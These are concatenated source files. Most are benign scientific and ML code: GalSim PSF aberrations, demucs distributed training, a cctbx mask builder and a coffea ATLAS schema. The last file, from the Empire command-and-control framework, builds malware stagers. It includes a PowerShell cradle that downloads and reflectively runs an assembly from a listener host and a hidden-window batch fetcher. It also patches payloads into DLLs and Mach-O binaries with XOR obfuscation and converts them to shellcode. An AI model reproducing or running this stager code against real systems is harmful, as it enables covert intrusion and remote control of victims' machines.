wave = zemax_wavelength
elif isinstance(wavelength, Bandpass):
wave = wavelength = wavelength.effective_wavelength
else:
wave = wavelength
# All parameters relevant to the aperture. We may be able to use a cached version.
aper = _make_aperture(SCA, pupil_plane_type, pupil_bin, wave, gsparams)
# Start reading in the aberrations for that SCA
aberrations, x_pos, y_pos = _read_aberrations(SCA)
# Do bilinear interpolation, unless we're exactly at the center (default).
use_aberrations = _interp_aberrations_bilinear(aberrations, x_pos, y_pos, SCA_pos)
if extra_aberrations is not None:
use_aberrations[:len(extra_aberrations)] += extra_aberrations
# We don't want to use piston, tip, or tilt aberrations. The former doesn't affect the
# appearance of the PSF, and the latter cause centroid shifts. So, we set the first 4
# numbers (corresponding to a place-holder, piston, tip, and tilt) to zero.
use_aberrations[0:4] = 0.
# Now set up the PSF, including the option to interpolate over waves
if wavelength is None:
PSF = ChromaticOpticalPSF(lam=zemax_wavelength,
diam=diameter, aberrations=use_aberrations,
aper=aper, gsparams=gsparams)
if n_waves is not None:
# To decide the range of wavelengths to use, check the bandpass.
bp_dict = getBandpasses()
bp = bp_dict[bandpass]
PSF = PSF.interpolate(waves=np.linspace(bp.blue_limit, bp.red_limit, n_waves),
oversample_fac=1.5)
else:
tmp_aberrations = use_aberrations * zemax_wavelength / wavelength
PSF = OpticalPSF(lam=wavelength, diam=diameter,
aberrations=tmp_aberrations,
aper=aper, gsparams=gsparams)
return PSF
def _read_aberrations(SCA):
"""
This is a helper routine that reads in aberrations for a particular SCA and wavelength (given as
galsim.roman.roman_psfs.zemax_wavelength) from stored files, and returns them along with the
field positions.
Parameters:
SCA: The identifier for the SCA, from 1-18.
Returns:
NumPy arrays containing the aberrations, and x and y field positions.
"""
from .. import meta_data
from . import pixel_scale, n_pix, pixel_scale_mm
# Construct filename.
sca_str = '_%02d'%SCA
infile = os.path.join(meta_data.share_dir, 'roman',
zemax_filepref + sca_str + zemax_filesuff)
# Read in data.
dat = np.loadtxt(infile)
# It actually has 5 field positions, not just 1, to allow us to make position-dependent PSFs
# within an SCA eventually. Put it in the required format: an array of length (5 field
# positions, 23 Zernikes), with the first entry empty (Zernike polynomials are 1-indexed so we
# use entries 1-22). The units are waves.
aberrations = np.zeros((5,23))
aberrations[:,1:] = dat[:,5:]
# Also get the field position. The file gives it in mm with respect to the center, but we
# want it in pixels with respect to the corner. The pixel size of the detector is 0.01 mm/pixel
# The y-coordinates have the opposite signs to the corresponding WFI location, explained
# in the Roman file.
x_sca_pos = dat[:,1]/pixel_scale_mm + n_pix/2
y_sca_pos = n_pix/2 - dat[:,2]/pixel_scale_mm
return aberrations, x_sca_pos, y_sca_pos
def _interp_aberrations_bilinear(aberrations, x_pos, y_pos, SCA_pos):
"""
This is a helper routine to do bilinear interpolation of aberrations defined at 4 field
positions: the four corners. Note that we also have aberrations at the center position,
    but these are generally quite close (within a few percent) to what would come from this bilinear
interpolation. So for simplicity, we just do the bilinear interpolation.
"""
min_x = np.min(x_pos)
min_y = np.min(y_pos)
max_x = np.max(x_pos)
max_y = np.max(y_pos)
x_frac = (SCA_pos.x - min_x) / (max_x - min_x)
y_frac = (SCA_pos.y - min_y) / (max_y - min_y)
lower_x_lower_y_ab = aberrations[(x_pos==min_x) & (y_pos==min_y), :]
lower_x_upper_y_ab = aberrations[(x_pos==min_x) & (y_pos==max_y), :]
upper_x_lower_y_ab = aberrations[(x_pos==max_x) & (y_pos==min_y), :]
upper_x_upper_y_ab = aberrations[(x_pos==max_x) & (y_pos==max_y), :]
interp_ab = (1.0-x_frac)*(1.0-y_frac)*lower_x_lower_y_ab + \
(1.0-x_frac)*y_frac*lower_x_upper_y_ab + \
x_frac*(1.0-y_frac)*upper_x_lower_y_ab + \
x_frac*y_frac*upper_x_upper_y_ab
return interp_ab.flatten()
|
650ed335c405298b82c01ae6ab60fc9f8f118a39
|
f132958875a962ee925e19fbb3f1266ba6a6e6cb
|
/demucs/distrib.py
|
dc1576cb49693df491d58c8813d5ebac6c8ff749
|
[
"MIT"
] |
permissive
|
facebookresearch/demucs
|
9fc8422f02b79c4d50500a9a02676e707809adb0
|
0cb4a90dbeb36b9495b505ad1ec90ac91feb7bc4
|
refs/heads/main
| 2023-08-21T19:07:44.858104
| 2023-08-02T21:21:52
| 2023-08-02T21:21:52
| 217,436,984
| 6,636
| 902
|
MIT
| 2023-08-25T08:44:09
| 2019-10-25T02:43:20
|
Python
|
UTF-8
|
Python
| false
| false
| 3,237
|
py
|
distrib.py
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
"""Distributed training utilities.
"""
import logging
import pickle
import numpy as np
import torch
from torch.utils.data.distributed import DistributedSampler
from torch.utils.data import DataLoader, Subset
from torch.nn.parallel.distributed import DistributedDataParallel
from dora import distrib as dora_distrib
logger = logging.getLogger(__name__)
rank = 0
world_size = 1
def init():
global rank, world_size
if not torch.distributed.is_initialized():
dora_distrib.init()
rank = dora_distrib.rank()
world_size = dora_distrib.world_size()
def average(metrics, count=1.):
if isinstance(metrics, dict):
keys, values = zip(*sorted(metrics.items()))
values = average(values, count)
return dict(zip(keys, values))
if world_size == 1:
return metrics
tensor = torch.tensor(list(metrics) + [1], device='cuda', dtype=torch.float32)
tensor *= count
torch.distributed.all_reduce(tensor, op=torch.distributed.ReduceOp.SUM)
return (tensor[:-1] / tensor[-1]).cpu().numpy().tolist()
def wrap(model):
if world_size == 1:
return model
else:
return DistributedDataParallel(
model,
# find_unused_parameters=True,
device_ids=[torch.cuda.current_device()],
output_device=torch.cuda.current_device())
def barrier():
if world_size > 1:
torch.distributed.barrier()
def share(obj=None, src=0):
if world_size == 1:
return obj
size = torch.empty(1, device='cuda', dtype=torch.long)
if rank == src:
dump = pickle.dumps(obj)
size[0] = len(dump)
torch.distributed.broadcast(size, src=src)
# size variable is now set to the length of pickled obj in all processes
if rank == src:
buffer = torch.from_numpy(np.frombuffer(dump, dtype=np.uint8).copy()).cuda()
else:
buffer = torch.empty(size[0].item(), device='cuda', dtype=torch.uint8)
torch.distributed.broadcast(buffer, src=src)
# buffer variable is now set to pickled obj in all processes
if rank != src:
obj = pickle.loads(buffer.cpu().numpy().tobytes())
logger.debug(f"Shared object of size {len(buffer)}")
return obj
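# Hedged usage note (not in the original module): typically only the source rank
# passes the object and every rank receives a copy, e.g.
#   cfg = share(cfg if rank == 0 else None, src=0)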
def loader(dataset, *args, shuffle=False, klass=DataLoader, **kwargs):
"""
Create a dataloader properly in case of distributed training.
If a gradient is going to be computed you must set `shuffle=True`.
"""
if world_size == 1:
return klass(dataset, *args, shuffle=shuffle, **kwargs)
if shuffle:
# train means we will compute backward, we use DistributedSampler
sampler = DistributedSampler(dataset)
# We ignore shuffle, DistributedSampler already shuffles
return klass(dataset, *args, **kwargs, sampler=sampler)
else:
        # We make a manual shard, as DistributedSampler would otherwise replicate some examples
dataset = Subset(dataset, list(range(rank, len(dataset), world_size)))
return klass(dataset, *args, shuffle=shuffle, **kwargs)
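# A minimal usage sketch (added for illustration; ``train_set`` and ``valid_set``
# are assumed torch Datasets defined elsewhere):
#   init()
#   train_loader = loader(train_set, batch_size=16, shuffle=True, num_workers=4)
#   valid_loader = loader(valid_set, batch_size=16, shuffle=False)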
|
c7953fefd02e9f7016bba4c7d22b69d931794a5a
|
5b6ba0f288b1e2ac236af846a9bf546a63228476
|
/xfel/command_line/make_mask.py
|
278a4ac866383bc5ac5952e28c0182536e7a8a8b
|
[
"BSD-3-Clause-LBNL"
] |
permissive
|
cctbx/cctbx_project
|
5b547b416cadbdf95cca21dace9f54272a08d98a
|
7f4dfb6c873fd560920f697cbfd8a5ff6eed82fa
|
refs/heads/master
| 2023-08-17T17:44:05.077010
| 2023-08-16T22:40:22
| 2023-08-16T22:40:22
| 39,508,026
| 206
| 131
|
NOASSERTION
| 2023-09-14T17:12:55
| 2015-07-22T13:36:27
|
Python
|
UTF-8
|
Python
| false
| false
| 10,561
|
py
|
make_mask.py
|
from __future__ import absolute_import, division, print_function
from six.moves import range
# -*- mode: python; coding: utf-8; indent-tabs-mode: nil; python-indent: 2 -*-
#
# LIBTBX_SET_DISPATCHER_NAME cxi.make_mask
#
# $Id: make_mask.py 411 2013-10-16 22:17:45Z aaron $
#
# This code reads three cctbx.xfel pickle format images and builds a mask from
# them. The first image should be an average from a dark run, the second the
# standard deviation from that run. The third image should be a maximum projection
# from a run with the beam on.
#
# The result is an image with all pixels which are valid for use set to 0, and
# those that are invalid set to -2 by default, or the value of the option passed in
# to mask_pix_val.
#
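# Example invocation (illustrative only; the pickle file names are hypothetical,
# the options mirror the parser defined below):
#
#   cxi.make_mask -a 2000 -s 10 -m 300 -o mask.pickle avg.pickle stddev.pickle max.pickle
#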
import dxtbx.format.Registry
from xfel.cxi.cspad_ana.cspad_tbx import dpack, dwritef2
from scitbx.array_family import flex
import sys
def point_in_polygon(point, poly):
""" Determine if a point is inside a given polygon or not. Polygon is a list of (x,y) pairs.
Code adapted from a dials polygon clipping test algorithm"""
if len(poly) < 3: return False
inside = False
for i in range(len(poly)):
j = (i+1) % len(poly)
if (((poly[i][1] > point[1]) != (poly[j][1] > point[1])) and
(point[0] < (poly[j][0] - poly[i][0]) * (point[1] - poly[i][1]) /
(poly[j][1] - poly[i][1]) + poly[i][0])):
inside = not inside
return inside
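# Hedged example (not in the original source): the centre of the unit square is
# inside it, a far-away point is not:
#   point_in_polygon((0.5, 0.5), [(0, 0), (1, 0), (1, 1), (0, 1)]) # -> True
#   point_in_polygon((2.0, 2.0), [(0, 0), (1, 0), (1, 1), (0, 1)]) # -> False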
def point_inside_circle(x,y,center_x,center_y,radius):
"""Determine if a given point (x,y) is inside a circle whose center is at
  (center_x, center_y) with the given radius."""
return (x-center_x)**2 + (y - center_y)**2 < radius**2
def run(argv=None):
import libtbx.option_parser
if (argv is None):
argv = sys.argv
command_line = (libtbx.option_parser.option_parser(
usage="%s [-v] [-p poly_mask] [-c circle_mask] [-a avg_max] [-s stddev_max] [-m maxproj_min] [-x mask_pix_val] [-o output] avg_path stddev_path max_path" % libtbx.env.dispatcher_name)
.option(None, "--verbose", "-v",
action="store_true",
default=False,
dest="verbose",
help="Print more information about progress")
.option(None, "--poly_mask", "-p",
type="string",
default=None,
dest="poly_mask",
help="Polygon to mask out. Comma-seperated string of xy pairs.")
.option(None, "--circle_mask", "-c",
type="string",
default=None,
dest="circle_mask",
help="Circle to mask out. Comma-seperated string of x, y, and radius.")
.option(None, "--avg_max", "-a",
type="float",
default=2000.0,
dest="avg_max",
help="Maximum ADU that pixels in the average image are allowed to have before masked out")
.option(None, "--stddev_max", "-s",
type="float",
default=10.0,
dest="stddev_max",
help="Maximum ADU that pixels in the standard deviation image are allowed to have before masked out")
.option(None, "--maxproj_min", "-m",
type="float",
default=300.0,
dest="maxproj_min",
help="Minimum ADU that pixels in the maximum projection image are allowed to have before masked out")
.option(None, "--mask_pix_val", "-x",
type="int",
default=-2,
dest="mask_pix_val",
help="Value for masked out pixels")
.option(None, "--detector_format_version", "-d",
type="string",
default=None,
dest="detector_format_version",
help="detector format version string")
.option(None, "--output", "-o",
type="string",
default="mask_.pickle",
dest="destpath",
help="output file path, should be *.pickle")
).process(args=argv[1:])
# Must have exactly three remaining arguments.
paths = command_line.args
if (len(paths) != 3):
command_line.parser.print_usage(file=sys.stderr)
return
if command_line.options.detector_format_version is None:
address = timestamp = None
else:
from xfel.cxi.cspad_ana.cspad_tbx import evt_timestamp
from iotbx.detectors.cspad_detector_formats import address_and_timestamp_from_detector_format_version
address, timestamp = address_and_timestamp_from_detector_format_version(command_line.options.detector_format_version)
timestamp = evt_timestamp((timestamp,0))
poly_mask = None
  if command_line.options.poly_mask is not None:
poly_mask = []
poly_mask_tmp = command_line.options.poly_mask.split(",")
if len(poly_mask_tmp) % 2 != 0:
command_line.parser.print_usage(file=sys.stderr)
return
odd = True
for item in poly_mask_tmp:
try:
if odd:
poly_mask.append(int(item))
else:
poly_mask[-1] = (poly_mask[-1],int(item))
except ValueError:
command_line.parser.print_usage(file=sys.stderr)
return
odd = not odd
circle_mask = None
if command_line.options.circle_mask is not None:
circle_mask_tmp = command_line.options.circle_mask.split(",")
if len(circle_mask_tmp) != 3:
command_line.parser.print_usage(file=sys.stderr)
return
try:
circle_mask = (int(circle_mask_tmp[0]),int(circle_mask_tmp[1]),int(circle_mask_tmp[2]))
except ValueError:
command_line.parser.print_usage(file=sys.stderr)
return
avg_path = paths[0]
stddev_path = paths[1]
max_path = paths[2]
# load the three images
format_class = dxtbx.format.Registry.get_format_class_for_file(avg_path)
avg_f = format_class(avg_path)
avg_i = avg_f.get_detectorbase()
avg_d = avg_i.get_raw_data()
stddev_f = format_class(stddev_path)
stddev_i = stddev_f.get_detectorbase()
stddev_d = stddev_i.get_raw_data()
max_f = format_class(max_path)
max_i = max_f.get_detectorbase()
max_d = max_i.get_raw_data()
# first find all the pixels in the average that are less than zero or greater
# than a cutoff and set them to the masking value
avg_d.set_selected((avg_d <= 0) | (avg_d > command_line.options.avg_max), command_line.options.mask_pix_val)
# set all the rest of the pixels to zero. They will be accepted
avg_d.set_selected(avg_d != command_line.options.mask_pix_val, 0)
# mask out the overly noisy or flat pixels
avg_d.set_selected(stddev_d <= 0, command_line.options.mask_pix_val)
avg_d.set_selected(stddev_d >= command_line.options.stddev_max, command_line.options.mask_pix_val)
# these are the non-bonded pixels
avg_d.set_selected(max_d < command_line.options.maxproj_min, command_line.options.mask_pix_val)
# calculate the beam center
panel = avg_f.get_detector()[0]
bcx, bcy = panel.get_beam_centre(avg_f.get_beam().get_s0())
if poly_mask is not None or circle_mask is not None:
minx = miny = 0
maxx = avg_d.focus()[0]
maxy = avg_d.focus()[1]
if poly_mask is not None:
minx = min([x[0] for x in poly_mask])
miny = min([y[1] for y in poly_mask])
maxx = max([x[0] for x in poly_mask])
maxy = max([y[1] for y in poly_mask])
if circle_mask is not None:
circle_x, circle_y, radius = circle_mask
if circle_x - radius < minx: minx = circle_x - radius
if circle_y - radius < miny: miny = circle_y - radius
if circle_x + radius > maxx: maxx = circle_x + radius
if circle_y + radius > maxy: maxy = circle_y + radius
sel = avg_d == command_line.options.mask_pix_val
for j in range(miny, maxy):
for i in range(minx, maxx):
idx = j * avg_d.focus()[0] + i
if not sel[idx]:
if poly_mask is not None and point_in_polygon((i,j),poly_mask):
sel[idx] = True
elif circle_mask is not None and point_inside_circle(i,j,circle_x,circle_y,radius):
sel[idx] = True
avg_d.set_selected(sel,command_line.options.mask_pix_val)
# have to re-layout the data to match how it was stored originally
shifted_int_data_old = avg_d
shifted_int_data_new = shifted_int_data_old.__class__(
flex.grid(shifted_int_data_old.focus()))
shifted_int_data_new += command_line.options.mask_pix_val
phil = avg_i.horizons_phil_cache
manager = avg_i.get_tile_manager(phil)
for i,shift in enumerate(manager.effective_translations()):
shift_slow = shift[0]
shift_fast = shift[1]
ur_slow = phil.distl.detector_tiling[4 * i + 0] + shift_slow
ur_fast = phil.distl.detector_tiling[4 * i + 1] + shift_fast
ll_slow = phil.distl.detector_tiling[4 * i + 2] + shift_slow
ll_fast = phil.distl.detector_tiling[4 * i + 3] + shift_fast
#print "Shifting tile at (%d, %d) by (%d, %d)" % (ur_slow-shift_slow, ur_fast-shift_fast, -shift_slow, -shift_fast)
shifted_int_data_new.matrix_paste_block_in_place(
block = shifted_int_data_old.matrix_copy_block(
i_row=ur_slow,i_column=ur_fast,
n_rows=ll_slow-ur_slow, n_columns=ll_fast-ur_fast),
i_row = ur_slow - shift_slow,
i_column = ur_fast - shift_fast
)
d = dpack(
active_areas=avg_i.parameters['ACTIVE_AREAS'],
address=address,
beam_center_x=bcx,
beam_center_y=bcy,
data=shifted_int_data_new,
distance=avg_i.distance,
timestamp=timestamp,
wavelength=avg_i.wavelength,
xtal_target=None,
pixel_size=avg_i.pixel_size,
saturated_value=avg_i.saturation)
dwritef2(d, command_line.options.destpath)
  # the minimum number of pixels to mask out, corresponding to the interstitial regions of the CS-PAD
min_count = 818265 # (1765 * 1765) - (194 * 185 * 64)
masked_out = len(avg_d.as_1d().select((avg_d == command_line.options.mask_pix_val).as_1d()))
assert masked_out >= min_count
print("Masked out %d pixels out of %d (%.2f%%)"% \
(masked_out-min_count,len(avg_d)-min_count,(masked_out-min_count)*100/(len(avg_d)-min_count)))
if (__name__ == "__main__"):
sys.exit(run())
|
606adf8960ab60905df8ddde46640e79eefc88a4
|
6a017c87a1c3e016de5e1704d23d1d2034fab41c
|
/src/coffea/nanoevents/schemas/physlite.py
|
1b9b892056948a89512baf771db6f8dc11a54782
|
[
"BSD-3-Clause"
] |
permissive
|
CoffeaTeam/coffea
|
53997aefbccf583cc901718b5c639a4b4535dbcd
|
a33fc173f3bf2be307bac6517e624fc6ce0c4c3e
|
refs/heads/master
| 2023-08-10T12:36:49.238010
| 2023-08-02T02:57:18
| 2023-08-02T02:57:18
| 159,673,139
| 116
| 100
|
BSD-3-Clause
| 2023-09-12T20:32:08
| 2018-11-29T13:47:57
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 5,670
|
py
|
physlite.py
|
import copy
import warnings
from collections import defaultdict
from coffea.nanoevents.schemas.base import BaseSchema, zip_forms
from coffea.nanoevents.util import quote
class PHYSLITESchema(BaseSchema):
"""PHYSLITE schema builder - work in progress.
This is a schema for the `ATLAS DAOD_PHYSLITE derivation
<https://gitlab.cern.ch/atlas/athena/-/blob/release/21.2.108.0/PhysicsAnalysis/DerivationFramework/DerivationFrameworkPhys/share/PHYSLITE.py>`_.
    Closely following `schemas.nanoaod.NanoAODSchema`, it is mainly built from
    naming patterns where the "Analysis" prefix has been removed, so the
    collections will be named Electrons, Muons, instead of AnalysisElectrons,
    AnalysisMuons, etc. The collection fields correspond to the "Aux" and
    "AuxDyn" columns.
    Collections are assigned mixin types according to the `mixins` mapping.
    All collections are then zipped into one `base.NanoEvents` record and returned.
    Cross references are built from ElementLink columns. Global indices are
created dynamically, using an ``_eventindex`` field that is attached to
each collection.
"""
__dask_capable__ = True
truth_collections = [
"TruthPhotons",
"TruthMuons",
"TruthNeutrinos",
"TruthTaus",
"TruthElectrons",
"TruthBoson",
"TruthBottom",
"TruthTop",
]
"""TRUTH3 collection names.
TruthParticle behavior is assigned to all of them and global index forms
for parent/children relations are created for all combinations.
"""
mixins = {
"Electrons": "Electron",
"Muons": "Muon",
"Jets": "Particle",
"TauJets": "Particle",
"CombinedMuonTrackParticles": "TrackParticle",
"ExtrapolatedMuonTrackParticles": "TrackParticle",
"GSFTrackParticles": "TrackParticle",
"InDetTrackParticles": "TrackParticle",
"MuonSpectrometerTrackParticles": "TrackParticle",
}
"""Default configuration for mixin types, based on the collection name.
The types are implemented in the `coffea.nanoevents.methods.physlite` module.
"""
for _k in truth_collections:
mixins[_k] = "TruthParticle"
def __init__(self, base_form, *args, **kwargs):
super().__init__(base_form)
form_dict = {
key: form for key, form in zip(self._form["fields"], self._form["contents"])
}
output = self._build_collections(form_dict)
self._form["fields"] = [k for k in output.keys()]
self._form["contents"] = [v for v in output.values()]
def _build_collections(self, branch_forms):
zip_groups = defaultdict(list)
has_eventindex = defaultdict(bool)
for key, ak_form in branch_forms.items():
# Normal fields
key_fields = key.split("/")[-1].split(".")
top_key = key_fields[0]
sub_key = ".".join(key_fields[1:])
objname = top_key.replace("Analysis", "").replace("AuxDyn", "")
zip_groups[objname].append(((key, sub_key), ak_form))
# add eventindex form, based on the first single-jagged list column
if (
not has_eventindex[objname]
and "List" in ak_form["class"]
and "List" not in ak_form["content"]["class"]
):
zip_groups[objname].append(
((key, "_eventindex"), self._create_eventindex_form(ak_form, key))
)
has_eventindex[objname] = True
# zip the forms
contents = {}
for objname, keys_and_form in zip_groups.items():
to_zip = {}
for (key, sub_key), form in keys_and_form:
if "." in sub_key:
# we can skip fields with '.' in the name since they will come again as records
# e.g. truthParticleLink.m_persKey will also appear in truthParticleLink
# (record with fields m_persKey and m_persIndex)
continue
if form["class"] == "RecordArray" and form["fields"]:
# single-jagged ElementLinks come out as RecordArray(ListOffsetArray)
# the zipping converts the forms to ListOffsetArray(RecordArray)
fields = [field.split(".")[-1] for field in form["fields"]]
form = zip_forms(
dict(zip(fields, form["contents"])),
sub_key,
)
to_zip[sub_key] = form
try:
contents[objname] = zip_forms(
to_zip,
objname,
self.mixins.get(objname, None),
bypass=True,
)
content = contents[objname]["content"]
content["parameters"] = dict(
content.get("parameters", {}), collection_name=objname
)
except NotImplementedError:
warnings.warn(f"Can't zip collection {objname}")
return contents
@staticmethod
def _create_eventindex_form(base_form, key):
form = copy.deepcopy(base_form)
form["content"] = {
"class": "NumpyArray",
"parameters": {},
"form_key": quote(f"{key},!load,!eventindex,!content"),
"itemsize": 8,
"primitive": "int64",
}
return form
@property
def behavior(self):
"""Behaviors necessary to implement this schema"""
from coffea.nanoevents.methods import physlite
return physlite.behavior
|
2e80d0c442d654a9cb7ad25b2d7474147618c851
|
1eca7ab68f713f9134549be8cff40d953d784326
|
/empire/server/common/stagers.py
|
5985787dc67af7892a43a99c6c83c42cc30237ec
|
[
"BSD-3-Clause"
] |
permissive
|
BC-SECURITY/Empire
|
65576ac931635cded054912a02ed5d02a1b41f8d
|
5b2ad2c2e9b9f996e40c484215dfea36fefc808d
|
refs/heads/main
| 2023-09-04T05:00:52.366894
| 2023-08-27T22:08:54
| 2023-08-27T22:08:54
| 199,975,883
| 3,651
| 601
|
BSD-3-Clause
| 2023-09-08T05:50:26
| 2019-08-01T04:22:31
|
PowerShell
|
UTF-8
|
Python
| false
| false
| 29,359
|
py
|
stagers.py
|
"""
Functionality that loads Empire stagers, sets generic stager options,
and abstracts the invocation of launcher generation.
The Stagers() class is instantiated in ./server.py by the main menu and includes:
generate_launcher() - abstracted functionality that invokes the generate_launcher() method for a given listener
generate_dll() - generates a PowerPick Reflective DLL to inject with base64-encoded stager code
generate_macho() - generates a macho binary with an embedded python interpreter that runs the launcher code
generate_dylib() - generates a dylib with an embedded python interpreter and runs launcher code when loaded into an application
"""
from __future__ import absolute_import, division
import base64
import errno
import logging
import os
import shutil
import string
import subprocess
import zipfile
from builtins import chr, object, str, zip
from itertools import cycle
import donut
import macholib.MachO
from empire.server.core.db import models
from empire.server.core.db.base import SessionLocal
from empire.server.utils import data_util
from empire.server.utils.math_util import old_div
from . import helpers
log = logging.getLogger(__name__)
class Stagers(object):
def __init__(self, MainMenu, args):
self.mainMenu = MainMenu
self.args = args
def generate_launcher_fetcher(
self,
language=None,
encode=True,
webFile="http://127.0.0.1/launcher.bat",
launcher="powershell -noP -sta -w 1 -enc ",
):
        # TODO: add handling for languages other than powershell
stager = (
'wget "'
+ webFile
+ '" -outfile "launcher.bat"; Start-Process -FilePath .\launcher.bat -Wait -passthru -WindowStyle Hidden;'
)
if encode:
return helpers.powershell_launcher(stager, launcher)
else:
return stager
def generate_launcher(
self,
listenerName,
language=None,
encode=True,
obfuscate=False,
obfuscation_command="",
userAgent="default",
proxy="default",
proxyCreds="default",
stagerRetries="0",
safeChecks="true",
bypasses: str = "",
):
"""
Abstracted functionality that invokes the generate_launcher() method for a given listener,
if it exists.
"""
with SessionLocal.begin() as db:
bypasses_parsed = []
for bypass in bypasses.split(" "):
bypass = (
db.query(models.Bypass).filter(models.Bypass.name == bypass).first()
)
if bypass:
if bypass.language == language:
bypasses_parsed.append(bypass.code)
else:
log.warning(f"Invalid bypass language: {bypass.language}")
db_listener = self.mainMenu.listenersv2.get_by_name(db, listenerName)
active_listener = self.mainMenu.listenersv2.get_active_listener(
db_listener.id
)
if not active_listener:
log.error(f"Invalid listener: {listenerName}")
return ""
launcher_code = active_listener.generate_launcher(
encode=encode,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
userAgent=userAgent,
proxy=proxy,
proxyCreds=proxyCreds,
stagerRetries=stagerRetries,
language=language,
listenerName=listenerName,
safeChecks=safeChecks,
bypasses=bypasses_parsed,
)
if launcher_code:
return launcher_code
def generate_dll(self, poshCode, arch):
"""
Generate a PowerPick Reflective DLL to inject with base64-encoded stager code.
"""
# read in original DLL and patch the bytes based on arch
if arch.lower() == "x86":
origPath = "%s/data/misc/ReflectivePick_x86_orig.dll" % (
self.mainMenu.installPath
)
else:
origPath = "%s/data/misc/ReflectivePick_x64_orig.dll" % (
self.mainMenu.installPath
)
if os.path.isfile(origPath):
dllRaw = ""
with open(origPath, "rb") as f:
dllRaw = f.read()
replacementCode = helpers.decode_base64(poshCode)
# patch the dll with the new PowerShell code
searchString = (("Invoke-Replace").encode("UTF-16"))[2:]
index = dllRaw.find(searchString)
dllPatched = (
dllRaw[:index]
+ replacementCode
+ dllRaw[(index + len(replacementCode)) :]
)
return dllPatched
else:
log.error(f"Original .dll for arch {arch} does not exist!")
def generate_powershell_exe(
self, posh_code, dot_net_version="net40", obfuscate=False
):
"""
Generate powershell launcher embedded in csharp
"""
with open(self.mainMenu.installPath + "/stagers/CSharpPS.yaml", "rb") as f:
stager_yaml = f.read()
stager_yaml = stager_yaml.decode("UTF-8")
# Write text file to resources to be embedded
with open(
self.mainMenu.installPath
+ "/csharp/Covenant/Data/EmbeddedResources/launcher.txt",
"w",
) as f:
f.write(posh_code)
compiler = self.mainMenu.pluginsv2.get_by_id("csharpserver")
if not compiler.status == "ON":
log.error("csharpserver plugin not running")
else:
file_name = compiler.do_send_stager(
stager_yaml, "CSharpPS", confuse=obfuscate
)
directory = f"{self.mainMenu.installPath}/csharp/Covenant/Data/Tasks/CSharp/Compiled/{dot_net_version}/{file_name}.exe"
return directory
def generate_powershell_shellcode(
self, posh_code, arch="both", dot_net_version="net40"
):
"""
Generate powershell shellcode using donut python module
"""
if arch == "x86":
arch_type = 1
elif arch == "x64":
arch_type = 2
elif arch == "both":
arch_type = 3
directory = self.generate_powershell_exe(posh_code, dot_net_version)
shellcode = donut.create(file=directory, arch=arch_type)
return shellcode
def generate_exe_oneliner(
self, language, obfuscate, obfuscation_command, encode, listener_name
):
"""
Generate a oneliner for a executable
"""
listener = self.mainMenu.listenersv2.get_active_listener_by_name(listener_name)
if getattr(listener, "parent_listener", None) is not None:
hop = listener.options["Name"]["Value"]
while getattr(listener, "parent_listener", None) is not None:
listener = self.mainMenu.listenersv2.get_active_listener_by_name(
listener.parent_listener.name
)
else:
hop = ""
host = listener.options["Host"]["Value"]
launcher_front = listener.options["Launcher"]["Value"]
# Encoded launcher requires a sleep
launcher = f"""
$wc=New-Object System.Net.WebClient;
$bytes=$wc.DownloadData("{host}/download/{language}/{hop}");
$assembly=[Reflection.Assembly]::load($bytes);
$assembly.GetType("Program").GetMethod("Main").Invoke($null, $null);
"""
# Remove comments and make one line
launcher = helpers.strip_powershell_comments(launcher)
launcher = data_util.ps_convert_to_oneliner(launcher)
if obfuscate:
launcher = self.mainMenu.obfuscationv2.obfuscate(
launcher,
obfuscation_command=obfuscation_command,
)
# base64 encode the stager and return it
if encode and (
(not obfuscate) or ("launcher" not in obfuscation_command.lower())
):
return helpers.powershell_launcher(launcher, launcher_front)
else:
# otherwise return the case-randomized stager
return launcher
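    # Rough shape of the emitted oneliner when encoding is enabled
    # (illustrative only; the exact prefix comes from helpers.powershell_launcher
    # and varies with the options chosen above):
    #     powershell -noP -sta -w 1 -enc <base64 of the UTF-16LE cradle>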
def generate_python_exe(
self, python_code, dot_net_version="net40", obfuscate=False
):
"""
Generate ironpython launcher embedded in csharp
"""
with open(self.mainMenu.installPath + "/stagers/CSharpPy.yaml", "rb") as f:
stager_yaml = f.read()
stager_yaml = stager_yaml.decode("UTF-8")
# Write text file to resources to be embedded
with open(
self.mainMenu.installPath
+ "/csharp/Covenant/Data/EmbeddedResources/launcher.txt",
"w",
) as f:
f.write(python_code)
compiler = self.mainMenu.pluginsv2.get_by_id("csharpserver")
        if compiler.status != "ON":
log.error("csharpserver plugin not running")
else:
file_name = compiler.do_send_stager(
stager_yaml, "CSharpPy", confuse=obfuscate
)
directory = f"{self.mainMenu.installPath}/csharp/Covenant/Data/Tasks/CSharp/Compiled/{dot_net_version}/{file_name}.exe"
return directory
def generate_python_shellcode(
self, posh_code, arch="both", dot_net_version="net40"
):
"""
Generate ironpython shellcode using donut python module
"""
if arch == "x86":
arch_type = 1
elif arch == "x64":
arch_type = 2
elif arch == "both":
arch_type = 3
directory = self.generate_python_exe(posh_code, dot_net_version)
shellcode = donut.create(file=directory, arch=arch_type)
return shellcode
def generate_macho(self, launcherCode):
"""
Generates a macho binary with an embedded python interpreter that runs the launcher code.
"""
MH_EXECUTE = 2
with open(
"%s/data/misc/machotemplate" % (self.mainMenu.installPath), "rb"
) as f:
macho = macholib.MachO.MachO(f.name)
if int(macho.headers[0].header.filetype) != MH_EXECUTE:
log.error("Macho binary template is not the correct filetype")
return ""
        cmds = macho.headers[0].commands
        offset = placeHolderSz = 0  # set once the __cstring section is located
for cmd in cmds:
count = 0
if int(cmd[count].cmd) == macholib.MachO.LC_SEGMENT_64:
count += 1
if (
cmd[count].segname.strip(b"\x00") == b"__TEXT"
and cmd[count].nsects > 0
):
count += 1
for section in cmd[count]:
if section.sectname.strip(b"\x00") == b"__cstring":
offset = int(section.offset) + (
int(section.size) - 2119
)
placeHolderSz = int(section.size) - (
int(section.size) - 2119
)
template = f.read()
if placeHolderSz and offset:
key = "subF"
launcherCode = "".join(
chr(ord(x) ^ ord(y)) for (x, y) in zip(launcherCode, cycle(key))
)
launcherCode = base64.urlsafe_b64encode(launcherCode.encode("utf-8"))
launcher = launcherCode + b"\x00" * (placeHolderSz - len(launcherCode))
patchedMachO = (
template[:offset] + launcher + template[(offset + len(launcher)) :]
)
return patchedMachO
else:
log.error("Unable to patch MachO binary")
def generate_dylib(self, launcherCode, arch, hijacker):
"""
